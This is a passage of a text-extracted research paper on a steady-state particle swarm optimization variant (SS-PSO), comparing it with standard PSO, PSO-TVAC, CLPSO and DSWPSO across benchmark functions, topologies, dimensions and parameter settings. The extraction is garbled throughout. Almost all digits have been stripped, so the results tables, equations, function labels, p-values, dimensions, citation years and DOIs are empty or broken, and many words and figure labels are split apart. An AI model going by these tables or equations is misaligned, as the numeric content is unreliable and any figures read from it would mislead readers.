, , , , , , , note: best median number of evaluations among the three algorithms shown in bold. table success rates. s-psolbest s-psovn s-psomoore f f f f f f f f f f note: best success rate among the three algorithms shown in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the convergence speed (only the functions on which the three algorithms attained the same success rates were considered in the ranking by convergence speed). overall, s-psomoore ranks first in terms of solutions quality and convergence speed—see fig. . therefore, we conclude that the moore structure is well suited for assessing the validity and relevance the ss-pso. once the best network has been found for this particular set of problems, the next step was to compare synchronous and a-psos on the most efficient topology. for that purpose, we have implemented a ss-psomoore and tested it on the -function set under the same conditions described above. the results can be found in table . table gives a comparison between the performance of s-psomoore and ss-psomoore based on the numerical results and statistical analysis of those same results. the non- parametric mann–whitney test was used to compare the distribution of fitness values and number of evaluations to meet criteria of each algorithm in each function. the ranking of fitness distributions are significant at p � . for f , f , f , f , f , f , that is, in these functions, the null hypothesis that the two samples come from the same population is rejected. for the remaining functions (f , f , f ), the null hypothesis is not rejected: the differences are not significant. table fitness rank by friedman test (with . significance level). the table gives the rank of each algorithm and in parenthesis the algorithms to which the differences are significant according to the friedman test. s-psolbest ( ) s-psovn ( ) s-psomoore ( ) p-value f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) . ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) . ( ) . f . ( ) . ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . table convergence speed rank by friedman test (with . significance level). the table gives the rank of each algorithm and in parenthesis the algorithms to which the differences are significant according to the friedman test. s-psolbest ( ) s-psovn ( ) s-psomoore ( ) p-value f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . f . ( ) . ( ) . ( ) ( ) . f . ( ) ( ) . ( ) ( ) . ( ) ( ) < . fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in terms of function evaluations, ss-psomoore is faster in the entire set of unimodal problems. in multimodal problems, ss-psomoore needs less evaluations in f , f , f and f . results of mann–whitney tests are significant at p � . for functions f , f , f , f , f , f , f and f —see table . the success rates are similar, except for f (in which ss-pso clearly outperforms the standard algorithm) and f . in conclusion: empirical results, together with statistical tests, show that according to accuracy, speed and reliability, ss-psomoore outperforms (a) fitness (b) convergence speed . . . . . lbest vn moore . . . . . lbest vn moore figure s-psolbest, s-psovn and s-psomoore: solutions quality (a) and convergence speed (b) rank by the friedman test. full-size doi: . /peerj-cs. /fig- table ss-psomoore results: solutions quality, convergence speed and success rates. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , . , , f . e+ . e+ . e+ , , , f . e- . e . e- , , , f . e . e . e , , , f . e . e . e- , , , f . e- . e- . e- , . , , f . e- . e- . e- , , , f . e- . e . e- , . , , table comparing s-psomoore and ss-psomoore with the mann–whitney test. f f f f f f f f f f fitness + + + ≈ ≈ + + ≈ + ≈ evaluations + + + ≈ + ≈ + + + + notes: +if ss-psomoore ranks first in the mann–whitney test and the result is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ s-psomoore in most of the benchmark functions selected for this test, while not being outperformed in any case. update strategy the preceding tests show that the steady state update strategy when implemented in a pso structured in a lattice with moore neighborhood improves its performance. the following experiment aims at answering an important question: what is the major factor in the performance enhancement? is it the steady state update, or instead the particles that are updated? in order to investigate this issue, two variants of ss-pso were implemented: one that updates the best particle and its neighbors (replace-best); and another that updates a randomly selected particle and its neighbors (replace-random). the algorithms were tested on the same set of benchmark functions and compared the proposed ss-psomoore (or replace-worst). results are in table . replace-best update strategy is outperformed by replace-worst ss-pso. with the exception of f and f , the quality of solutions is degraded when compared to the proposed ss-pso. however, success rates are considerably lower in most functions, including f and f . please note that functions f and f are unimodal and therefore they can be easily solved by hill-climbing and greedy algorithms. it is not surprising that a greedy selective strategy like ss-pso with replace-best can find very good solutions in some runs. however, for more difficult problem, replace-best is clearly unable to find good solutions. as for replace-random, it improves s-pso in some functions, but in general is not better than replace-worst: replace-random ss-pso is less accurate and slower in most of the functions. the friedman test shows that ss-pso with replace-worst strategy ranks first in terms of solutions quality—see fig. . table compares replace-random and replace-worst with the assistance of mann–whitney statistical tests. except for f , replace-worst is significantly more efficient table results of ss-pso variants: median, min, max and success rates (sr). ss-psomoore (replace-best) sr ss-psomoore (replace-random) sr fitness evaluations fitness evaluations median min max median min max median min max median min max f . e- . e- . e+ , , , . e- . e- . e- , , , f . e+ . e- . e+ , , , . e- . e- . e+ , , , f . e- . e- . e+ , , , . e- . e- . e- , , , f . e+ . e+ . e+ , , , . e+ . e+ . e+ , , , f . e- . e . e+ , , , . e . e . e- , . , , f . e- . e . e- , . , , . e . e . e- , , , f . e . e . e+ – – – . e- . e . e , , , f . e . e- . e , , , . e- , e- . e- , . , , f . e- . e- . e+ , , , . e- . e- . e+ , , , f . e+ . e . e+ , , , . e- . e . e- , , , fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than replace-random. the experiment demonstrates that selective pressure imposed on the least fit individuals is the major factor in the performance of ss-pso. scalability the proof-of-concept showed that ss-pso outperforms s-pso in most of the functions in the test set, and the previous experiment demonstrates that the major factor in the performance enhancement is the pressure on the least fit particles. however, only instances of the problems with d = have been tested; therefore, another question arises at this point: does the improvement shown by ss-pso hold for a wide range of problem sizes? in order to answer that question, we have conducted a scalability study: the algorithms were tested on the same set functions but with d ranging from to (except f , which is a two-dimensional function and for that reason was excluded from this test). as in previous experiments, the algorithms were first run for a limited amount of function evaluations and the best fitness values were recorded. then, the algorithms were all run for , evaluations or until reaching a function-specific stop criterion. the number of iterations required to meet the criterion was recorded and statistical measures were taken over runs. (function f has not been tested for dimensions and because the cec benchmark, from where the orthogonal rotational matrices m have been taken, does not provide the matrices for those dimensions). table shows the median best fitness values attained by each algorithm on each instance of the problems and table shows the success rates. in terms of quality of . . . . . rep. best rep. random rep. worst figure fitness rank by friedman test. full-size doi: . /peerj-cs. /fig- table comparing replace-worst and replace-random with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ ≈ + + + ≈ evaluations + + + - + + + + + + notes: +if replace-worst ranks first in the mann–whitney test and the result is significant. -if replace-random ranks first and the result is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solutions, the performance patterns observed with d = are maintained: the strategy does not introduce scalability difficulties. as for the success rates, except for a few instances, ss-pso attains better or equal success rates. the convergence speed has been graphically represented for better assessment of the effects of growing problem size—see fig. . the graphs show that the proposed strategy does not introduce scalability difficulties (other than the ones intrinsic to standard psos). it also shows that, in general, ss-pso is faster than s-pso. parameter sensitivity particle swarm optimization performance can be severely affected by the parameter values. the inertia weight and acceleration coefficients must be tuned in order to balance exploration and exploitation: if far from the optimal values, convergence speed and/or solution quality can be significantly reduced. population size also influences the performance of population-based metaheuristics: larger populations help to maintain table solutions quality with different problem dimension. d = d = d = d = d = s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso f . e- . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e . e . e- . e- . e- . e- . e- . e- . e- . e- f . e- . e . e- . e- . e- . e- . e- . e- . e- . e- f . e . e . e+ . e+ . e+ . e+ . e+ . e+ . e+ . e+ f . e- . e- . e- . e- . e . e- . e . e- . e . e f . e . e . e . e . e- . e . e- . e- . e- . e- f . e- . e- . e- . e- . e- . e- . e- . e- . e- . e- f . e . e . e- . e- . e- . e- . e+ . e+ . e+ . e+ f . e- . e- – – . e- . e- – – . e . e note: best median fitness among the two algorithms shown in bold. table success rates with different problem dimension. d = d = d = d = d = s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso s-pso ss-pso f f f f f f f f f – – – – note: best success rates among the two algorithms shown in bold. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ d = d = d = d = d = ev al ua �o ns (a) sphere s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (b) quadric s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (c) hyper s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (d) rastrigin s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (e) griewank s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (f) weierstrass s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (g) ackley s-pso moore ss-pso moore d = d = d = d = d = ev al ua �o ns (h) shi�ed quadric with noise s-pso moore ss-pso moore d = d = d = ev al ua �o ns (i) rotated griewank s-pso moore ss-pso moore figure convergence speed versus problem dimension for sphere (a), quadric (b), hyper (c), rastrigin (d), griewank (e), weierstrass (f), ackley (g), shifted quadric with noise (h) and rotated griewank (i) benchmark functions. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ diversity, but they slow down convergence speed; on the other hand, smaller populations are faster but they are more likely to converge to local optima. furthermore, psos empirical studies usually depend on a single set of parameters for several functions with different characteristics. this is the case of this paper, in which a typical parameter setting has been used for evaluating the performance of the psos. that set of parameters is not expected to be the optimal tuning for every function, but instead a compromised solution to avoid the exponential growth of experimental procedures. for these reasons, when testing a new pso, it is important to investigate its sensitivity to the parameter values. with that purpose in mind, the following experimental procedure has been designed. synchronous pso and ss-pso were tested on function f (unimodal), f (multimodal), f (shifted and noisy) and f (rotated) with the following parameter values: inertia weight was set to . , . , . , . and . , while acceleration coefficients and population size remained fixed at . and ; then, c and c were set to . , . , . , . and . while v and m remained fixed at . and , respectively; finally, population size was set to , and , while v and the acceleration coefficients were set to . and . . the results are depicted in figs. – . the graphics show that the performance indeed varies with the parameter values, as expected. in the case of function f , other parameter settings attain better results than the ones used in previous section. however, the relative performance of s-pso and ss-pso maintains throughout the parameters ranges. in functions f , f and f , the quality of solutions is in general maximized by v and c values around the ones used in previous sections. convergence speed, in general, improves with lower v, c and m values. as seen in fig. , s-psomoore ranks first in terms of solutions quality and convergence speed when compared to ring and von neumann topologies. although not a parameter in the strict sense of the term, the network topology is a design choice that significantly affects the performance of the algorithm: kennedy & mendes ( ) investigated several types of networks and recommend the use of von neumann lattices; fernandes et al. ( ) tested regular graphs and concluded that convergence speed improves with the degree of connectivity but success rates are in general degraded when k is above nine (equivalent to moore neighborhood) and a that good compromise is achieved with � k � . in order to study the performance of ss-pso with different network topologies, regular graphs have been constructed with the following procedure: starting from a ring structure with k = , the degree is increased by linking each individual to its neighbors’ neighbors, creating a set of regular graphs with k ¼ f ; ; ; ; . . . ; mg, as exemplified in fig. for population size . parameters c and c were set to . and v to . and population size m was set to . the algorithms were all run for , function evaluations or until reaching the function-specific stop criterion given in table . each algorithm has been executed times with each function and statistical measures were taken over those runs. figure shows the success rates and convergence speed of ss-pso structured by topologies with varying k. convergence generally improves with k, achieving optimal values for � k � in most of the functions. however, as seen in fig. a, best success rates are achieved when � k � (except f , for which k = is the best topology). fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ .e- .e- .e- .e- .e- .e- .e- .e- .e- .e- .e- .e+ . . . . . fit ne ss iner�a weight, ω a s-pso ss-pso . . . . . ev al ua �o ns iner�a weight, ω b s-pso ss-pso .e- .e- .e- .e- .e- .e- .e- .e- .e+ . . . . . fit ne ss accelera�on coefficients, c , c c s-pso ss-pso . . . . . ev al ua �o ns accelera�on coefficients, c , c d s-pso ss-pso e- e- e- e- e- e- e- e- e- . . fit ne ss popula�on size, � e s-pso ss-pso ev al ua �o ns popula�on size, � f s-pso ss-pso figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on sphere function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ e- e- e- . . . . . fit ne ss iner�a weight, ω a s-pso ss-pso . . . . . ev al ua �o ns iner�a weight, ω b s-pso ss-pso e- e- e- . . . . . fit ne ss accelera�on coefficients, c , c c s-pso ss-pso . . . . . ev al ua �o ns accelera�on coefficients, c , c d s-pso ss-pso e- e- e- fit ne ss popula�on size, µ e s-pso ss-pso ev al ua �o ns popula�on size, µ f s-pso ss-pso figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on ackley function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ .e- .e- .e- .e- .e- .e- .e+ . . . . . fit ne ss iner�a weight, ω a s-pso ss-pso . . . . . ea lu a� on s iner�a weight, ω b s-pso ss-pso .e- .e- .e- .e- .e- .e- .e+ .e+ .e+ . . . . . fit ne ss accelera�on coefficients, c , c c s-pso ss-pso . . . . . ev al ua �o ns accelera�on coefficients, c , c d s-pso ss-pso .e- .e- .e- .e- .e- .e- .e+ fit ne ss popula�on size, µ e s-pso ss-pso ev al ua �o ns popula�on size, µ f s-pso ss-pso figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on shifted quadric with noise function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ .e+ .e- .e- .e- .e- .e- .e- . . . . . fit ne ss iner�a weight, ω a s-pso ss-pso . . . . . fit ne ss iner�a weight, ω b s-pso ss-pso .e+ .e- .e- .e- .e- .e- .e- . . . . . fit ne ss accelera�on coefficients, c , c c s-pso ss-pso .e+ .e+ .e+ .e+ .e+ .e+ .e+ .e+ .e+ .e+ . . . . . fit ne ss accelera�on coefficients, c , c d s-pso ss-pso .e+ .e- .e- .e- .e- .e- .e- fit ne ss popula�on size, μ e s-pso ss-pso .e+ .e+ .e+ .e+ .e+ .e+ .e+ fit ne ss popula�on size, μ f s-pso ss-pso figure fitness (a, c, e) and number of evaluations sensitivity (b, d, f) on griewank function (f ) to inertia weight (a–b), acceleration coefficients (c–d) and population size (e–f). full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these conclusions are similar to those by fernandes et al. ( ) related to the standard pso and are coincident with the typical rule of thumb for psos: highly connected topologies are faster but less reliable, while topologies with lower connectivity require more evaluations to meet the convergence criteria but converge more often to the solution. please remember that we are not trying to find the best set of parameters for each function. the most important conclusions here is that ss-pso does not seem to be more sensitive to the parameters than s-pso, displaying similar patterns when varying v, c and c and m, and that the performance enhancement brought by ss-pso is observed on a reasonably wide range of parameter values. time-varying parameters an alternative approach to parameter tuning is to let the parameters values change during the run, according to deterministic or adaptive rules. in order to avoid tuning effort and adapt the balance between local and global search to the search stage, shi & eberhart ( ) proposed a linearly time-varying inertia weight: starting with an initial and pre-defined value, the parameter value decreases linearly with time, until it reaches the minimum value. the variation rule is given by eq. ( ): v tð Þ ¼ v � v ð Þ � max t � tð Þ max t þ v ( ) where t is the current iteration, max_t is the maximum number of iterations, v the inertia weigh initial value and v its final value. (a) k = (b) k = (c) k = = μ figure regular graphs with population size μ = and k = (a), k = (b) and k = = μ (c). full-size doi: . /peerj-cs. /fig- a b k = k = k = k = k = k = k = k = su cc es sf ul ru ns f f f f f f f f f f k = k = k = k = k = k = k = k = fit ne ss e va lu a� on s f f f f f f f f f f figure ss-pso with different topologies. (a) success rates. (b) mean fitness evaluations to a solution. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ later, ratnaweera, halgamuge & watson ( ) tried to improve shi and eberhart’s pso with time-varying inertia weight (pso-tviw) using a similar concept applied to the acceleration coefficients. in the pso with time-varying acceleration coefficients pso (pso-tvac) the parameters c and c change during the run according to the following equations: c ¼ c f � c i � � � t max t þ c i ( ) c ¼ c f � c i � � � t max t þ c i ( ) where c i, c f, c i, c f are the acceleration coefficients initial and final values. the experiments in this section compare pso-tvac with ss-pso-tvac (i.e., pso- tvac with the steady-state update strategy). parameters v and v were set to . and . . the acceleration coefficient c initial and final values were set to . and . and c ranges from . to . , as suggested by ratnaweera, halgamuge & watson ( ). the results are in table (pso-tvac) and table (ss-pso-tvac). table compares the algorithms using mann–whitney tests. ss-pso-tvac improves pso-tvac in every unimodal function in terms of accuracy and convergence speed and it is significantly faster in functions f , f , f and f while attaining similar results. pso-tvac only outperforms ss-pso-tvac in the noisy f function. these results show that the steady state version of pso-tvac is able to improve the convergence speed of the original algorithm in several types of fitness landscapes. furthermore, ss-pso-tvac achieves more accurate solutions in the unimodal problems. comprehensive learning pso the following experiment aims at comparing the proposed ss-pso with the clpso (liang et al., ; lynn & suganthan, ). clpso uses an alternative velocity updating equation: vi;d tð Þ ¼ v � vi;d t � ð Þ þ c � r � pfi dð Þ;d � xi;d t � ð Þ � � ( ) table pso-tvac results. fitness evaluations sr median min max median min max f . e- . e- . e- , , , f . e- . e- . e , , , f . e- . e- . e- , , , f . e+ . e+ . e+ , , , f . e . e . e- , , , f . e . e . e , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e . e- , , , note: medians are shown in bold if pso-tvac provides similar or better results than ss-pso-tvac (table ). fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ where fi ! ¼ fi ð Þ; fi ð Þ; . . . fi dð Þð Þ defines which particle’s best solutions particle i should follow. hence, the term pfi(d),d can refer to the corresponding dimension of any particle’s best found solution so far. the decision depends on a probability pc, different for each particle and computed a priori. following the guidelines and parameters in liang et al. ( ), clpso and ss-clpso have been implemented and tested in the set of benchmark functions. comprehensive-learning pso performance is strongly dependent on the refreshing gap parameter m, which defines the number of generations during which the particles are allowed to learn from fi without improving their fitness. after m generations without fitness improvement, fi is reassigned. in order to make fair comparisons, parameter m was first optimized for each function. the other parameters were set as in liang et al. ( ). then, ss-clpso was tuned using the same parameter setting as the corresponding clpso. the results are in tables and and statistical analysis is in table . on the one hand, the results show that, in general, a steady-state strategy applied to clpso does not improve the performance of the algorithm. on the other hand, ss-clpso does not degrade the general behavior of clpso. please note that clpso does not use a traditional topology. in this case, to construct ss-clpso, we use a moore neighborhood to decide which particles to update along with the least fit individuals, but, unlike ss-pso or ss-pso-tvac, the structure does not define the information flow within the swarm. table ss-pso-tvac results. fitness evaluations sr median min max median min max f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e+ . e . e+ , , , f . e . e . e- , , , f . e . e . e , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e . e . e- , , , note: medians are shown in bold if ss-pso-tvac provides similar or better results than pso-tvac (table ). table comparing ss-pso-tvac and pso-tvac with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ ≈ ≈ ≈ ≈ ≈ evaluations + + + ≈ ≈ + + + - + notes: +if ss-pso-tvac ranks first in the mann–whitney test and the result is significant. -if pso-tvac ranks first and the results is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ since neighboring particles communicate and use each other’s information, they tend to travel through similar regions of the landscape, but in clpos there is not necessarily a relationship between the particles in the set and this clustering behavior is not present. for a steady-state strategy to take full advantage of the clpso dynamic network, maybe it table clpso results. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e- – – – – f . e- . e- . e- , , , f . e . e . e+ , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e – – – – f . e . e . e- , , , note: medians are shown in bold if clpso provides similar or better results than ss-clpso (table ). table ss-clpso results. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e – – – – f . e- . e- . e- , , , f . e+ . e . e+ , , , f . e . e . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e- , , , f . e- . e- . e – – – – f . e . e . e- , , , note: medians are shown in bold if ss-clpso provides similar or better results than clpso (table ). table comparing ss-pso and clpso with the mann-whitney test. f f f f f f f f f f fitness ≈ ≈ ≈ ≈ ≈ ≈ - ≈ ≈ ≈ eval. ≈ – ≈ - + ≈ + - – + notes: +if ss-pso ranks first in the mann–whitney test and the result is significant. -if clpso ranks first and the results is significant. ≈if the differences are not significant. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ is necessary to define a dynamic update strategy which takes into account the current set of particles from which an individual is learning at a specific period of the run. steady-state updates strategies for pso in dynamic networks is planned as future work. dynamic small world pso the final experiment compares ss-pso with the dswpso, recently proposed by vora & mirlanalinee ( ). dswpso uses a static von neumann topology to which a number of random connections are added in each iteration. it is a very simple variation of the standard pso, but it attains quite interesting results when compared to a number of state-of-the-art psos. for this paper, dswpso was tested with von neumann and moore topologies. the number of random neighbors in each topology was set to , as suggested by vora & mirlanalinee ( ). parameters c and c were set to . and v to . . the algorithms were all run for , function evaluations. dswpso results are table dswpso with von neumann neighborhood and two random neighbors. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e+ , , , f . e- . e- . e- , , , f . e+ . e+ . e+ , , , f . e+ . e+ . e- , . , , f . e+ . e+ . e- , , , f . e- . e+ . e+ , , , f . e- . e- . e+ , , , f . e- . e- . e+ , , , f . e- . e+ . e- , , , table dswpso with moore neighborhood and two random neighbors. fitness evaluations median min max median min max sr f . e- . e- . e- , , , f . e- . e- . e+ , , , f . e- . e- . e- , , , f . e+ . e+ . e+ , , , f . e- . e+ . e- , . , , f . e+ . e+ . e- , , , f . e- . e+ . e+ , , , f . e- . e- . e+ , , , f . e- . e- . e+ , , , f . e- . e+ . e+ , , , fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ presented in table (von neumann) and table (moore). the statistical analysis that compares ss-pso and dswpso are in table (von neumann) and table (moore). it is clear that ss-pso outperforms dswpso with both von neumann and moore base-topology in most of the functions, not only in terms of convergence speed, but also in solution quality. figure shows the convergence curves (median best fitness values over runs) of s-pso, ss-pso and dswpso (von neumann). the graphics show that ss-pso converges faster to the vicinity of the solutions. furthermore, and although it is not perceivable in the graphics, ss-pso eventually reaches solutions closer to f(x) = (the optimum of both functions) as demonstrated by tables and . running times a final experiment compares s-pso and ss-pso running times. the algorithms are run on function f with d set to , , and . moore neighborhood is used in both table comparing ss-pso and dswpso (von neumann) with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ + + + + + eval. + + + + + + + + ≈ + notes: +if ss-pso ranks first in the mann–whitney test and the result is significant. -if dswpso ranks first and the results is significant. ≈if the differences are not significant. table comparing ss-pso and dswpso (moore) with the mann-whitney test. f f f f f f f f f f fitness + + + ≈ ≈ ≈ + + + + eval. + + + + + ≈ + + ≈ + notes: +if ss-pso ranks first in the mann–whitney test and the result is significant. -if dswpso ranks first and the results is significant. ≈if the differences are not significant. . . . . fit ne ss func�on evalua�ons (a) sphere (f ) s-pso ss-pso dswpso . . . . fit ne ss func�on evalua�ons (b) weierstrass (f ) s-pso ss-pso dswpso figure s-pso, ss-pso and dswpso best fitness curves for the sphere (a) and weierstrass (b) benchmark functions. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithms and parameters are set as in previous experiments. figure shows the running times of , functions evaluations (median values over runs for each algorithm). the running times of each algorithm are statistically equivalent for every d value. running times of ss-pso with von neumann and moore neighborhood are also equivalent. the perfandpubtools software (fachada et al., ) was used to analyze the running times. discussion the experiments in the previous sections demonstrate that ss-pso is able to significantly improve the performance of the standard pso, at least on the set of benchmark functions. the differences are particularly noticeable in the convergence speed of the algorithms, but ss-pso is also able to improve the solution quality in several functions (see table ). an experiment comparing three different steady-state strategies show that replacing the worst particle and its neighbors is the best strategy. our initial hypothesis (reducing the number of evaluations in each time step, while focusing only on the worst solutions, reduces the computational effort to reach a solution) is confirmed. the relative performance of ss-pso and standard pso has also been verified for a wide range of parameter values (see figs. – ) as well as for different problem dimensions (see fig. ). these results are important since they demonstrate that the proposed strategy has not been fine-tuned and that its validity is not restricted to a particular region of the parameter space or problem dimension. the algorithm was also compared to a pso with time-varying acceleration, again attaining good results, thus reinforcing the idea that the steady-state strategy is consistent and robust. ss-pso was compared to clpso, and while being outperformed in terms of solution quality in four functions, it yields better solutions in two problems, and is faster in other two functions. since clpso is considered to be a very efficient algorithm, these results are promising. it deserves further examination whether variants of ss-pso could clearly outperform clpso. finally, ss-pso was compared to dswpso with excellent results. d = d = d = d = t( s) s-pso ss-pso figure s-pso and ss-pso running times. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions this paper investigates the performance of a new and unconventional updated strategy for the pso. the ss-pso is inspired by the bak–sneppen model of coevolution. however, while in the bak–sneppen model the worst individual and its neighbors are replaced by random values, in ss-pso the worst particle and its neighbors are updated and evaluated in each time step. the remaining particles are kept in a steady state until they eventually satisfy the update criterion. due to its strategy, ss-pso may be classified within the a-psos category. however, its working mechanisms are radically different from standard a-psos. after preliminary tests that determined the best topology for a set of ten unimodal, multimodal, shifted, noisy and rotated benchmark problems, the strategy was implemented on the winning structure: two-dimensional lattice with moore neighborhood. quality of solutions, convergence speed and success rates were compared and statistical analyses were conducted on the results. ss-pso significantly improved the performance of a standard s-pso in every function, at least in one of the two criteria (quality of final solutions and convergence speed). a parameter sensitivity analysis showed that ss-pso is not more sensitive to the variation of parameter values than s-pso. a scalability test showed that the proposed strategy does not introduce scalability difficulties. the algorithm was compared to pso-tva, clpso and dswpso with good results. the first step in future works is to increase the size of the test with more functions, hoping that an extended test set can improve our insight into the behavior of the algorithm. the emergent properties of the algorithm (size of events, duration of stasis, critical values) will be also studied and compared to those of the bak–sneppen model. finally, steady-state update strategies in dynamic topologies will be investigated. additional information and declarations funding this work was supported by fundação para a ciência e tecnologia (fct) research fellowship sfrh/bpd/ / and fct project (uid/eea/ / ), ephemech (tin - -c - -p, spanish ministry of economy and competitivity), proy-pp - (plan propio ugr), project cei -mp-v of the microprojects program from cei biotic granada. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fundação para a ciência e tecnologia (fct), research fellowship: sfrh/bpd/ / . fct project: uid/eea/ / . ephemech: tin - -c - -p, spanish ministry of economy and competitivity. proy-pp - : plan propio ugr. cei -mp-v of the microprojects program from cei biotic granada. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � carlos m. fernandes conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � nuno fachada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � juan-julián merelo authored or reviewed drafts of the paper, approved the final draft. � agostinho c. rosa authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/laseeb/openpso. references allmendiger r, li x, branke j. . reference point-based particle swarm optimization using a steady-state approach, seal . lecture notes in computer science : – doi . / - - - - _ . aziz nab, mubin m, mohamad ms, aziz ka. . a synchronous-asynchronous particle swarm optimisation algorithm. scientific world journal : doi . / / . baillieul j, samad t. . encyclopedia of systems and control. london: springer-verlag. bak p. . how nature works. new york: springer-verlag, . bak p, sneppen k. . punctuated equilibrium and criticality in a simple model of evolution. physical review letters ( ): – doi . /physrevlett. . . bak p, tang c, wiesenfeld k. . self-organized criticality: an explanation of /f noise. physical review letters ( ): – doi . /physrevlett. . . boettcher s, percus ag. . optimization with extremal dynamics. complexity ( ): – . carlisle a, dozier g. . an off-the-shelf pso. in: proceeding of 